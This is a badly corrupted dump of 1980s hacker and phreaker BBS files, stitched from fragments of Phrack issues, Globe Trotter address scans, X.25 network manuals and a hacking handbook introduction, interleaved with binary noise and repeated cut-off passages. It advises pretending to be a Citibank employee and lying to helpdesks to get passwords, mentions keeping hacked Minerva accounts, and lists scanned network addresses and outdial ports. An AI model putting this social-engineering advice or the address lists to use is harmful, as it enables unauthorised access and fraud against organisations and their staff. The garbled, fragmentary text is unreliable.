CONNECTED Your connection has been established. DISCONNECTED Your connect has been disconnected. NOT CONNECTED Your not connect to any service at the time. NUI REQUIRED Enter your network user ID. PASSWORD = Request for your assigned password. STILL CONNECTED You are still connected to the service you were using. ? Network p?doesn't understand your entry. Type B User Commands and Messages Since the Type B procedure is used with GTN dial-ups, it requires fewer commands to control the network. There is only 1 Type B command. Break plus (CR) allows you to retain connection to one service, and connect with another. Screen Shows: Explanation: CITICORP (CITY NAME). Network Welcome banner. Type in service address. PLEASE SELECT SERVICE COM Connection made. DER The port is closed out of order, or no oLpen routes are available. DISCONNECTED You have disconnected from the service and the network. ERR Error in service selected. INV Error in system. MOM Wait, the connection is being made. NA Not authorized for this service. NC Circuits busy, try again. NP Check service address. OCC Service busy, try again. Sign-on Procedures: There are two types of sign on procedures. Type A and Type B. Type A: To log onto a system with type A logon procedure, the easiest wa y is through Telenet. Dial your local Telenet port. When you receive the "@" prompt, type in the Type-A service address (Found later in the article) then follow the instructions from there on. Type-B: Dial the your GTN telephone #, then hit return twice. You will then see: "PLEASE ENTER YOUR ID:-1->" Type in a network ID number and hit return. You will then see "PLEASE ENTER YOUR PASSWORD:-2->" Type in Network Password and hit return. Finally you will see the "C  9V*ITICORP (city name)" welcome banner, and it will as you to select the service you wish to log onto. Type the address and hit return. (A list of addresses will be provided later) Trouble Shooting: If you should run into any problems, the Citicorp personnel will gladly help there "employees" with any questions. Just pretend you work for Citibank and they will give you alot. This has been tried and tested. Many times, when you attempt to log on to a system and you QL8 make a mistake with the password, the system will give you a number to call for help. Call it and tell them that you forgot your pass or something. It usually works, since they don't expect people to be lying to them. If you have any questions about the network itself, call 305-975-5223. It is the Technical Operations Center (TOC) in Pompano, Florida. Dial-Ups: The following list of dial-ups is for North America. I have a list of others, but I don't think that they wou  yaYXWVU x31{ UK_ Some Handy Info On Minerva -------------------------- As most of you know, the security on Minerva has increased dramatically. Stories of hackers losing Minerva accounts in matter of minutes from the time they were hacked, are not uncommon. Well I did a bit of snooping around and drummed up some techniques to help hackers keep the Minerva accounts for longer periods. The first thing a hacker must do as soon as he is successful i  ! <;PONMLKJIHGF[Z x47{ Z; 2 ===== Phrack Magazine presents Phrack 16 ===== ===== File 5 of 12 ===== ---------------------------------------------------------------------------- | The Laws Governing Credit Card Fraud | | | | Written by Tom Brokaw | | September 19, 1987 9876543210@?>=EDCBA%x48"{AEY ===== Phrack Magazine presents Phrack 16 ===== ===== File 6 of 12 ===== ****************************************************************************** * * * TAPPING TELEPHONE LINES * * * * VOICE OR DATA */.-,+*)('&%: x 496{:p ===== Phrack Magazine presents Phrack 16 ===== ===== File 7 of 12 ===== ------------------------------------------------------------------------ - The Disk Jockey - - presents: - - - - Reading Trans-Union Reports: - -  6#"! $|x 59{$- / / / / / / / / / / / / / Phreaking Australia. By Ivan Trotsky... Without Any Cards / / / / / / / / / / / / / P H R E A K I N G A U S T R A L I A -=====================================- -===================================- -=================================- Edition 1... This file will be broken down into 8 Parts. Section 1 Method 1.. This first method was realy the first taste  Yx B28{+++++++++++++++++++++++++++++++++++++++ + MIDAS TUTORIAL WRITTEN BY + + + + THE BUZZARD + + + + SOURCE:MIDAS OPERATOR'S MANUAL + + DECEMBER 1984 + + + +++++++++++++++++++++++++++++++++++++++ Procedure Summary for Direct Midas Access ---------------------------------------------- 1.Switch your terminal to correct operaV7ting mode. 2.Dial your MIDAS telephone number and wait for the high pitched tone. 3.Switch to data in the manner appropiate for your terminal. 4.Enter an '=' (equals) sign. 5.MIDAS will respond with: MIDAS XXXXX * 6.Enter N-0 7.You will then be connected to your host computer. Procedure Summary for Midas Access Via Austpac ----------------------------------------------- 1.Switch your terminal to correct operating mode. 2.Dial your AUSTPAC telephone n)umber and wait for the high pitched tone. 3.Switch to data in the manner appropiate for your terminal. 4.Enter your terminal speed indicator if applicable. 5.AUSTPAC will respond with: AUSTPAC 6.Enter: ?N-0 7.You will then be connected to your host computer. Some frequently called numbers ------------------------------ [Ed:add these to the already growing list!!!!] Host Host Address ======================================= Allegheny International 3106002807 Bibliographical Retrieval Service 3106000581 Chemical Abstracts 3106001467 Citshare Corporation 310690014601 or 310690014602 Commodity Systems 3106000071 Compuserve 3106001134 Dow Jones 3106001763 ESA-European Space Agency 23421920115600 Infomedia Corporation 3106000307 I.P. Sharp Associates Inc.3106000155 Lockhead (Dialyog) 3106900061 or 3106900803 or 31104150002001 P.S.S. Hostess Service (UK Database Info) 2342192000515 S.D.C. (Orbit) 3106001509 [Ed. Some of these may be a little out of date. So E & O.E. The P.S.S. Hostess Service is very good for getting info!] Direct MIDAS Access ------------------- MIDAS Telephone access numbers 1.If your terminal operates in the #/range of 110bps - 300bps you should dial the telephone number 02 20991 2.If your terminal operates at 1200bps you should dial the telephone number 02 20992 3.If your terminal operates at 1200bps recieve and 75bps transmit (i.e. PRESTAL) you should dial the telephone number 02 20993 4.These telephone numbers are toll-free throughout Australia. YOUR PASSWORD As defined by international standards your password is now know as a NETWORK USER IDENTIFIER and this is abbreviated in many publications to NUI. LOGGING IN ERRORS 1.If you incorrectly enter your NUI, MIDAS will respond with CLR ERR Errors of this nature may result in automatic disconnection from MIDAS. If this occurs, you should hang up your telephone, check your procedures and dial again. 2.If you enter an invalid Host Address Number, MIDAS will respond with a clear message as shown in the next section, and return you to the "*" prompt. You may then try again. 3.Failure to input an "=" (equals) sign will res2ult in disconnection after 20 seconds. SERVICE MESSAGES FROM MIDAS --------------------------- When establishing a call thru MIDAS you may recieve a message indicating the status of your call attempt. Examples of these messages are listed below, with an explanation of their meaning. SERVICE MESSAGE EXPLANATION ======================================= CLR OCC Called number is engaged CLR NC Temporary Network congestion or temporary fault condition CLR INV  R Invalid facility requested CLR NA Correspondance with the wanted destination is not admitted CLR ERR Procedure error caused by your terminal CLR RPE Remote procedure error CLR NP The called number is not assigned to any data terminal CLR DER The called number is out of order CLR PAD MIDAS has cleared the call at the request of the remote party CLR DTE The remote party has cleared the call RESET DTE Remote party has cleared t G`he call RESET ERR Reset due to local procedure error RESET NC Reset due to network congestion RESET KNO Reset due to network operational error (This will revoke the X-ON, X-OFF option if enabled for that call) RESET RPE Reset due to procedure by the remote party RESET RDO Reset due to remote DTE operation RESET DER Reset due to any other error such as line failure MIDAS ACCES VIA AUSTPAC ----------------------- 110bps - 300bps DIAL 01921 1200bps  Ž DIAL 01922 1200bps/75bps DIAL 01921 (1200bps recieve/75bps transmit) [Ed: well that's the end of it! When I get some more time and some more high tech info I'll write further on the subject!!] -END ature may result in automatic disconnection from MIDAS. If this occurs, you should hang up your telephone, check your procedures and dial again. 2.If you enter an invalid Host Address Number, MIDAS will respond with a clear message as shown in the next Remote party has cleared t !x! Vyk50{ v# #### PHRACK PRESENTS ISSUE 16 #### ^*^*^*^Phrack World News, Part 1^*^*^*^ **** File 8 of 12 **** From the 9/16 San Francisco Chronicle, page A19: GERMAN HACKERS BREAK INTO NASA NETWORK (excerpted) Bonn A group of West German computer hobbyists broke into an international computer network of the National Aeronautics and Space Administration and rummaged freely among the data for at least three months bef"#!g     #-Ny1{"Wg The following information is from the AUSTPAC character terminal manual. Austpac is available all the time except (currently) 11pm Thu - 7am Fri. This is their maintainance window. (Melb. time). When you don't include an NUI in a call request it will perform reverse charges, if the called system allows. ADDRESSING : There are 2 formats of this in call requests, long and short. o Long format address: Used in international destinations and some national ones. DNIC -$ %O%y_29{$=>FTHE MIDAS FILE PART 2 -------------- ====== MAKING A DIRECT MIDAS CALL TO AN INTERNATIONAL DESTINATION ----------------------------------------------------------------- 1.Make sure your terminal is switched on and in the FULL DUPLEX, UPPER CASE, ASCII mode. 2.Dial the MIDAS access number and wait for the high pitched tone. 3.Connect your terminal to the telephone line by either:- depressing the DATA button on the data phone or terminal, or placing the telephone handset firm&'~' y851{& #### PHRACK PRESENTS ISSUE 16 #### ^*^*^*^Phrack World News, Part 2^*^*^*^ **** File 9 of 12 **** [Ed's Note:Certain Things in the article have been blanked (XXXXX) at the request of the author] The Story of the Feds on XXXXXXX BBS By The Mad Phone Man Returning home one afternoon with a freind, I knew somthing wasn't right when I walked into the computer room. I see a "N( )MB)y63{(2 ================================ = Basic Minerva OTC Commands = = Latest Update April 1990 = = = = Written By = = = = Reign of Terror...: = = = = MCMXC Anno Domini = ===============================*+,P543210/.-,+ y26{*,BINTRODUCTION ------------ The word 'hacker' is used in two different but associated ways: for some, a hacker is merely a computer enthusiast of any kind, who loves working with the beasties for their own sake, as opposed to operating them in order to enrich a company or research project - or to play games. This book uses the word in a more restricted sense: hacking is a recreational and educational sport. It consists of attempting to make unauthorised entry into computers a*-)nd explore what is there. The sport's aims and purposes have been widely misunderstood; most hackers are NOT interested in perpetrating massive frauds, modifying their personal banking, taxation and employee records, or inducing one world super-power into inadvertantly commencing Armageddon in the mistaken belief that another super-power is about to attack it. Every hacker I have ever come across has been quite clear about where the fun lies: it is in developing an understanding of a*.uoQm system and finally producing the skills and tools to defeat it. In the vasyt majority of cases, the process of 'getting in' is much more satisfying than what is discovered in the protected computer files. In this resepect, the hacker is the direct decendant of the phone phreaks of fifteen years ago. Phone phreaking became interesting as intr-nation and international subscribers trunk dialing was introduced, but when London-based phreak finally chained his way through to Hawaii,*/j h he usually had no one there to speak to except the local weather service or American Express office, to confirm that the desired target had indeed been hit. One of the earliest of the present generations of hackers, Susan Headly, only 17 when she began her exploits in California in 1977, chose as her target the local phone company and, with the information extracted from her hacks, ran all over the telephone network. She 'retired' four years later, when friends started developing sc*0-hemes to shut down part of the phone system. There is also a strong affinity with program copy-protection crunchers. Most commerical software for micros is sold in a form to prevent obvious casual copying, say by loading a cassette, cartridge or disk into memory and then executing a 'save' on to a blank cassette or disk. Copy-protection devices vary grestly in their methodology and sophistication and there are those who, without any commercial motive, enjoy nothing so much as de*1\73feating them. Every computer buff has met at least one cruncher (RAD: or Krakist as I call 'em) with a vast store of commercial programs, all of which have somehow had the protection removed - and perhaps the main title altered to show the crunchers tec. skills - but which are then never actually USED at all. Perhaps I should tell you what you can reasonably expect from this handbook. Hacking is an activity like few others: it is semi-legal, seldom encouraged, and in its full e*2^xtent so vast that no individual or group, short of an organization like GCHQ or NSA, could hope to grasp a fraction of the possibilities. So this is not one of those books with titles like GAMES PROGRAMMING WITH THE 6502 where, if the book is any good and if you are any good, you will emerge with some mastery of the subject-matter. The aim of this book is merely to give you some grasp of the methodology, help you develop the appropriate attitudes and skills, provide essential backgr*3+uound and some referencing material - and point you in the right direction for more knowledge. Up to a point, each chapter may be read by itself; I have compiled extensive appendicies, containing material which will be of use long after the main body of the text has been absorbed. It is one of the characteristics of hacking anecdites, like those relating to espoinage exploits, that almost no one closely involved has much stake in the truth; victims want to describe damage as mini* 4 mal, and perpetrators like to paint themselves as heroes while carefully disguising sources and methods. In addition, journalists who cover such stories are not always sufficiently competent to write accurate, or even to know when they are being hoodwinked. So far as possible, I have treid to verify each story that appears in these pages (Rad: text files!), but hacks of recent years are more remote than I would have liked. In these cases, my accounts are of events and methods which, * 5} in all the circumstances, I believe to be true. I welcome notes of correction. Experienced hackers may identify one or two curious gaps in the range of coverage, or less then full explainations; you can chose any combinations of the following explanations without causing me to worry: first, I may be ingorant and incompetent, second, much of the fun of hacking is making your own discoveries, and I wouldn't want to spoil that; third, maybe there are a few areas which are just best* ' left alone. Nearly all of the material is applicable to readers in all countries; however, the author is British and so are most of his experiences. The pleasures of hacking are possible at almost any level of computer competence beyond rank begginner and with quite minimal equipment. It is quite difficult to decribe the joy of using the world's cheapest micro, some clever firmware, a home-brew acoustic coupler and find that, courtesy of a friendly remote PDP11/70, you can6)7̠{7LyR2{6ATYPE AUSTPAC.DOC TYPE Ver 5.3 - Multiple file lister CTL-S pauses, CTL-X skips to next file, CTL-C aborts ===> LISTING FILE: AUSTPAC .DOC AUSTPAC -------------------------------- 1 . Austpac General Information 2 . Austpac Logon Instructions 3 . Austpac Error Codes 4 . Setting Austpac PAD Parameters 5 . Austpac Phone Connections 6 . ------> AUSTPAC UPDATE <------ AUSTPAC GENERAL INFORMATION -------------------------------- Charges : You can 8B9̴"mlkj~}|{zyxwvu9|y18{8'8 - G L O B E T R O T T E R - +=+=+=||===============================================================||=+=+=+ + Volume #5, File #1 Date: 14/08/1988 + + + + + + Written By: ----====} THE FORCE {====---- From The depths of THE REALM + +=+=+=||:::::::::::::::: ;Pba`_ontsrqp;y60{:p+Z$ BROUGHT BY TGM & DEPECHE MODE NOW5 SECS.. BULLETIN ABOUT RECENT PHREAKING BUSTS BY PAD (PHREAKERS AND DISTRIBUTORS) $$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$ BEFORE THIS G-FILE IS STARTED, WE WANT TO MAKE SOMETHING PERFECTLY CLEAR. THIS G-FILE APPLIES TO ALL CURRENT AND FUTURE PHREAKERS. IT IS NOT JUST FOR THE SO-CALLED "ELITE" HACKERS THAT YOU HE<?=%$#"! 210<;:9876543HGFEDCBA@?>SRQPONMLKJI^]\[ZYXWVUTfedcihg=vy 19{<g'8Y - G L O B E T R O T T E R - +=+=+=||===============================================================||=+=+=+ + Volume #5, File #2 Date: 14/08/1988 + + + + + + Written By: ----====} THE FORCE {====---- From The depths of THE REALM + +=+=+=||::::::::::::::: .r߾߼߽߻߻о߯߾߱߼߽ߦ߲߻߯ߺ߻߼߫߾߷ج߰߾ߨ߷߸߷߽߭׶߷߰ߨ߫ߪ߾߯Ѱ߽ߩ߾׾جѻث߽ߨ߾߾ߨ߱ߨ߽ѱ߬߸ױ߼߾߶߱߬?@q'&@ y 52{?&[/]:::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::[\] |\| [ DP ] The Devil's Playground Network [ DP ] |/| |/| Presents |\| |\| Melbourne The following Australia |/| |/| In Association with |\| |\| The Forgotten Realm BBS |/| |/| [ DPt aƱSHOW HACK/1 cbu\[ scrolltextpBD9D XRAUSTPAC # 2{VS2pCE6oE XRHACKING CHAPTER 1{fS4pB BSHOW HACK/2 tBsqC{HACKINGP # 6 BY DONATELLO{oG{C .S6pKN6iN XRHACKING CHAPTER 4|S7QpJ ,SHOW HACK/6tBGCFJsqK|HACKINGP # 6 BY DONATELLO|oG{MO6oO XRHACKING CHAPTER 5}#S8SpK !USHOW HACK/7tBGCFJKsqM|HACKINGP # 6 BY DONATELLO|oG{M %SHOW HACK/8tBGCFJKMsqP| HACKINGP # 6 BY DONATELLO| oG{PR6lR XRHACKING CHAPTER 6 }S9UpQT.T XRMV8000 GENERAL COMPUTERS}S11pP a繅SHOW HACK/9 cbu\[ scrolltextPpSV;MyV XRINTERNATIONAL PACKET SWITCHING}eS12pQ 4}SHOW HACK/11 N |S7QpUXX XRFORCE FILE # 1 VOLUME # 1}S13spS 4OSHOW HACK/12 O }#S8SpWZZ XRFORCE FILE # 1 VOLUME 2} S14pU 4vSHOW HACK/13 R }S9UpY\\ XRFORCE FILE # 1 VOLUME # 3} $S15pW SHOW HACK/14 tBGCFJKMsWqY} VHACKINGP # 6 BY DONATELLO} FoG{[`]X(` XRINTERESTING NUMBERS~RS17pY SHOW HACK/15 tBGCFJKMsWYq[} HACKINGP # 6 BY DONATELLO} oG{]^^ XRFORCE FILE # 1 VOLUME # 4~S16p] أSHOW HACK/16 3210/.CBA@?>=<;:9NMLKJIHGFEDYXWVUTSRQPOdvV$[menu]p_b^b XRFORCE FILE # 1 VOLUME # 5.1~NS18p[ SHOW HACK/17 tBGCFJKMsWYq[_~HACKINGP # 6 BY DONATELLO~oG{ad^Bd XRFORCE FILE # 1 VOLUME # 5.2~S19p_ SHOW HACK/18 tBGCFJKMsWYq[_a~HACKINGP # 6 BY DONATELLO~oG{cfRnyf HACKING VAX/VMS~ 6S20pa SHOW HACK/19 tBGCFJKMsWYq[_ac~HACKINGP # 6 BY DONATELLO~zoG{c SHOW HACK/20 tBGCFJKMsWYq[_ace~ HACKINGP # 6 BY DONATELLO~ oG{gjBkj XRHACKER CODE OF ETHICSS22pilwl XRHACKING PART 1S23pg XSHOW HACK/22 tBGCFJKMsWYq[_acegiAHACKINGP # 6 BY DONATELLO1oG{knwn XRHACKING PART 2S24pi SHOW HACK/23 tBGCFJKMsWYq[_acegikHACKINGP # 6 BY DONATELLOoG{mpw\p XRHACKING PART 3cS25pk SHOW HACK/24 tBGCFJKMsWYq[_acegikmuHACKINGP # 6 BY DONATELLOtoG{or|fr XR HACKER INTRODUCTION S26pm jSHOW HACK/25 tBGCFJKMsWYq[_acegikmoHACKINGP # 6 BY DONATELLOoG{qtyt XRLOCK PICKING S27po SHOW HACK/26 tBGCFJKMsWYq[_acegikmoq HACKINGP # 6 BY DONATELLO oG{svF)v XRMIDAS OPERATORS MANUAL 1S28pq SHOW HACK/27 tBGCFJKMsWYq[_acegikmoqs oHACKINGP # 6 BY DONATELLO `oG{uxFx XRMIDAS OPERATORS MANUAL 2S29ps QSHOW HACK/28 tBGCFJKMsWYq[_acegikmoqsujHACKINGP # 6 BY DONATELLO[oG{wzg8NSz XRHACKING DICTIONARYS30pu WSHOW HACK/29 tBGCFJKMsWYq[_acegikmoqsuwHACKINGP # 6 BY DONATELLOoG{y|S| XRMINERVAkS31pw SHOW HACK/30 tBGCFJKMsWYq[_acegikmoqsuwyHACKINGP # 6 BY DONATELLO~oG{{~&~ XROTC DATA ACCESSS34py ֐SHOW HACK/31 tBGCFJKMsWYq[_acegikmoqsuwy{HACKINGP # 6 BY DONATELLOoG{}*N XRPHRACK 1/12S40p{ 3SHOW HACK/34 tBGCFJKMsWYq[_acegikmoqsuwy{}HACKINGP # 6 BY DONATELLOtoG{+ XRPHRACK 10/12S41p} _SHOW HACK/40 tBGCFJKMsWYq[_acegikmoqsuwy{}.HACKINGP # 6 BY DONATELLOoG{+ XRPHRACK 11/129S42p )SHOW HACK/41 tBGCFJKMsWYq[_acegikmoqsuwy{}HACKINGP # 6 BY DONATELLOtoG{* XRPHRACK 2/12S44p jSHOW HACK/42 tBGCFJKMsWYq[_acegikmoqsuwy{}HACKINGP # 6 BY DONATELLOoG{+l XRPHRACK 12/12KS43p HSHOW HACK/43 tBGCFJKMsWYq[_acegikmoqsuwy{}HACKINGP # 6 BY DONATELLOoG{* XRPHRACK 3/12 S45p SHOW HACK/44 tBGCFJKMsWYq[_acegikmoqsuwy{}HACKINGP # 6 BY DONATELLOoG{* XRPHRACK 5/12S47p SHOW HACK/45 tBGCFJKMsWYq[_acegikmoqsuwy{} HACKINGP # 6 BY DONATELLO oG{*^ XRPHRACK 4/12FS46p SHOW HACK/46 tBGCFJKMsWYq[_acegikmoqsuwy{} HACKINGP # 6 BY DONATELLO oG{* XRPHRACK 6/12S48p SHOW HACK/47 tBGCFJKMsWYq[_acegikmoqsuwy{}AHACKINGP # 6 BY DONATELLO*oG{*ԅ XRPHRACK 7/12 S49p SHOW HACK/48 tBGCFJKMsWYq[_acegikmoqsuwy{}-HACKINGP # 6 BY DONATELLOoG{*n XRPHRACK 8/12&S50p O(jdp N$"<I(l/ / g ,倲l"4(T`,2(jtp NJg2**p$A. J (F >r҉"t`ԉ#B\&<0։#C,(<؉#D*<ډ#E <((j8N#A$r <,(jN#A <0(jDN%ABB?}===== June 7, 1988 Well, Phrack Inc. is still alive but have changed Editors AGAIN. I, Crimson Death am now the new Editor of Phrack Inc. The reason why I am the new editor is because of the previous editors in school and they did not just have the time for it. So, if you would like to submit an article for Phrack Inc. please contact: Crimson Death, Control C, or Epsilon, or call my BBS (The Forgotten Realm) or one of the BBS's on the sponsor BBS l?Risting (Found in PWN Part 1). We are ALWAYS looking for more files to put in upcomming issues. Well, that about does it for me. I hope you enjoy Phrack 18 as much as we at The Forgotten Realm did bringing it to you. Later... Crimson Death Sysop of The Forgotten Realm Phrack is Distributed in Australia by: The Devil's Playground BBS Network, Contact ?MʴUser #276 on Node 1 (03) 338-4687 24hrs All Speeds to 9600! Call Today Don't Delay, Australia's Best Apple Support BBS! ------------------------------------------------------------------------------ This issue of Phrack Inc. includes the following: #1 Index of Phrack 18 by Crimson Death (02k) #2 Pro-Phile XI on Ax Murderer by Crimson Death (04k) #3 An Introduction to Packet Switched Networ?qks by Epsilon (12k) #4 Primos: Primenet, RJE, DPTX by Magic Hasan (15k) #5 Hacking CDC's Cyber by Phrozen Ghost (12k) #6 Unix for the Moderate by Urvile (11k) #7 Unix System Security Issues by Jester Sluggo (27k) ============================================================================== ck is Distributed in Australia by: The Devil's Playground BBS Network, Contact <7Jng ACF 302090600044 Port Select - "Please enter select character" = 906 43 302090600045 Port Select - "enter system id" C - "PASSWORD: " 302090600054 302090600057 IBM - "MHP999A ENTER ACCESS PASSWORD: " 302090600072 - 302090600091 Gateway - Develcon Toronto DATAPAC - Y - 30<8j_U2090600121 - 302090600125 - 302090600126 - 302090600127 - 302090600128 - 302090600129 - 302090600130 - 302090600160 SIME - 'Please enter your terminal ID?' 302090600166 - 302090600170 fax - 302090600173 - 302090600178 - "FEAH ent<9 -;ler appropriate code for access" 302090600181 VAX/VMS - 302090600182 Primos - PRIMENET 20.2.6 TENEX 302090600252 - "FEAH enter appropriate code for access" 302090600255 - "FEAH enter appropriate code for access" 302090600901 - "FEAH enter appropriate code for access" 302090600902 Port Select - "please enter select character" = 906 43 D A T A P A C 302091600xxx Sprint, <:!hFBy: ---===} THE FORCE {===--- ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From the depths of - THE REALM - 25/01/1987 =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= 302091600041 302091600046 302091600047 302091600048 302091600097 ATLAS VAX8600 UNIVERSITY OF TORONTO 302091600124 302091600161 302091600169 DNM121A 302091600181 302091600182 302091600183 302091600184 3020<;"k_H91600185 302091600186 302091600187 302091600188 302091600189 302091600190 302091600192 302091600193 302091600194 302091600210 302091600212 host 302091600221 302091600222 PRIMENET 19.4.5 ULS 302091600237 302091600281 OUTDIAL 302091600282 OUTDIAL 302091600283 OUTDIAL 302091600284 OUTDIAL 302091600315 OUTDIAL 302091600316 OUTDIAL 302091600317 OUTDIAL 302091600318 OUTDIAL 302091600319 OUTDIAL 302091600391 302091600398 host 302091600416 302091600901 OUTDIAL 300 <<#a;BAUD 302091600902 OUTDIAL 1200 BAUD D A T A P A C 302091900xxx Sprint, By: ---===} THE FORCE {===--- ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From the depths of - THE REALM - 26/12/1987 =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= 302091900022 - Outdial Port 302091900023 - Outdial Port 302091900024 - <=${|uOutdial Port 302091900025 - Outdial Port 302091900900 - Outdial Port 300 Baud 302091900901 - Outdial Port 1200 BAUD =============================================================================== IN THE NEXT ISSUE OF GLOBE TROTTER ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ - Definatelly the last of Datapac for a while. I will release some Nua's either from PSS, DATEX-P or on<>%Se of the Asian Networks Not Exactly sure which, so it will be a surprise. - I am planning a Guided Tour of The Realm, so it might be in the next issue, in which case it will be larger then usuall. Lot of people wanted to have a look around, so this is the only possible way. - Various Bits of information which I hope will come up in time Till Volume #6 Catch Ya Later ----====} THE FORCE {====---- From the depths of - The Realm - =========<?u====================================================================== END tion which I hope will come up in time Ti 300 Baud 302091900901 - Outdial Port 1200 BAUD =============================================================================== IN THE NEXT ISSUE OF GLOBE TROTTER ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ - Definatelly the last of Datapac for a while. I will release some Nua's either from PSS, DATEX-P or on?'w ] [ DP ] |\| [\]:::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::[/] |/| D Call and Support: F |\| |\| I The Devil's Playground BBS A |/| |/| A (03) 338-4687 - 300/1200/2400/9600 S |\| |\| L Call Today Don't Delay! T |/| |/| ?I |\| |\| Magical Hassan <- Special Thanx to: -> Forth Protocol |/| [/]:::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::[\] [ Source: The Archives of Magical Hassan - User #276 Devil's Playground BBS ] ==Phrack Inc.== Volume Two, Issue 18, Phile #1 of 7 Index )i5$)r <0(jNJfG" #A`G" #A") <0(jN")t0#B$r#A($n$$)ԁv0($*ԁ(rҩ(` <@(j8N$r <0(jN#A$r#A(tm6t ")$Nr0ԁ&*֩(8t ")$N#A$tԩ("`"*84g*$*p,(jN#Ap,(j,NtEfr#A")p,(j,NtNfr #A` r;g`t gVv=gLJg$x؉&$) ")p,ITNJ @`LfrNp,(jN#Ar g tf~p,(jNJgrNJfr=fp,(jNrNrNrNNqNo K directiveKeyword too long *#pXRlrN")ҩ")") !rNNq*|0X#Fr#An6$ԁv0(() $)"&)p$INJfrNrҩ`rN$`p,(jN#At gv"fx#Dp,(jN#A`r")XfJgB$B(t#BJfG0" p8IXNp8(jN#A`f@p8(jN`f(r#A(pT(j8N$r pD(j<41ݧ$rom The depths of - THE REALM - Date: 23/02/1988 =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= 302090500001 VAX/VMS - 302090500021 - 302090500026 - "Enter appropriate code for access" 302090500027 - "Enter appropriate code for access" 302090500028 - KARDGARD 300-C Motor Fuel Mngmnt. Site 1 302090500029 <52tW - "Enter appropriate code for access" 302090500030 - "Enter appropriate code for access" 302090500031 - "Enter appropriate code for access" 302090500900 - "Enter appropriate code for access" 302090500901 - "Enter appropriate code for access" D A T A P A C 302090600xxx Sprint, By: ---===} THE FORCE {===--- ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<6wC~~~~~~~~~~~~~~~~~~~ From the depths of - THE REALM - 14/05/1988 =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= 302090600031 - (Incompatible Dte From Telenet) 302090600043 Port Select - "Please enter select character" A - Manpower IBM IST45I N - Running ACF IBM IST45I T - Runni<*4" - Outdial Port 302085700447 - Outdial Port 302085700448 - Outdial Port 302085700449 - Outdial Port 302085700450 - Outdial Port 302085700451 - Outdial Port 302085700495 VAX/VMS V4.3 - Micro Vms V4.3 302085700496 fax - 302085700901 - Outdial Port 300 Baud 302085700902 - Outdial Port <+5hC1200 Baud D A T A P A C 302087100xxx Sprint, By: ---===} THE FORCE {===--- ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From The depths of - THE REALM - Date: 25/02/1988 =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= 302087100010 - "Illegal Node Name, Please Try again" 302087100024 - "User ID/CODE<,6"^ D'USAGER? " 302087100025 - "User ID/CODE D'USAGER? " 302087100046 VAX/VMS - 302087100047 - "Illegal Node Name, Please Try again" 302087100067 - "User ID/CODE D'USAGER? " 302087100071 Primos 19.4.11 - PRIMENET 19.4.11 NOPS.E 302087100072 Primos 19.4.11 - PRIMENET 19.4.11 NOPS.E 302087100900 - "User-ID/CODE D'USAGER? " 302087100901 <-7|Aͨ- "Illegal Node Name, Please Try again" D A T A P A C 302087200xxx Sprint, By: ---===} THE FORCE {===--- ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From The depths of - THE REALM - Date: 23/02/1988 =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= 302087200028 - 302087200042 - 302087200048 - 30208720007<.8 8 - 302087200085 VAX/VMS - Rapcor 302087200090 - 302087200093 RSTS V8.0-07 - W&C System A 302087200094 RSTS V8.0-07 - W&C System B 302087200101 - "C@" 302087200104 VAX/VMS - 302087200167 Port Select PACX - Extrusion PACX 2000 "Service? " 302087200185 RSTS V8.0-07 - Ext 11/70 EX3 302087200196 - "Enter appropriate code for </9 access" 302087200197 - 302087200211 - "V21>" 302087200213 - "Enter appropriate code for access" 302087200214 - "Enter appropriate code for access" 302087200215 - "Enter appropriate code for access" 302087200219 - 302087200900 - "Enter appropriate code for access" 302087200901 - "Enter appropriate co<0:gde for access" D A T A P A C 302087400xxx NUA's, By: ---===} THE FORCE {===--- ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From The depths of - THE REALM - Date: 23/05/1988 =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= This area has not been sprinted yet. 302087400099 - (CTRL-E) D A T A P A C 302089400xxx Sprint, By: ---===} THE FORCE {===--- ~~<1;^{~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From the depths of - THE REALM - 29/12/1987 =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= 302089400014 - "User Name/Nom D'Usager?" 302089400100 - 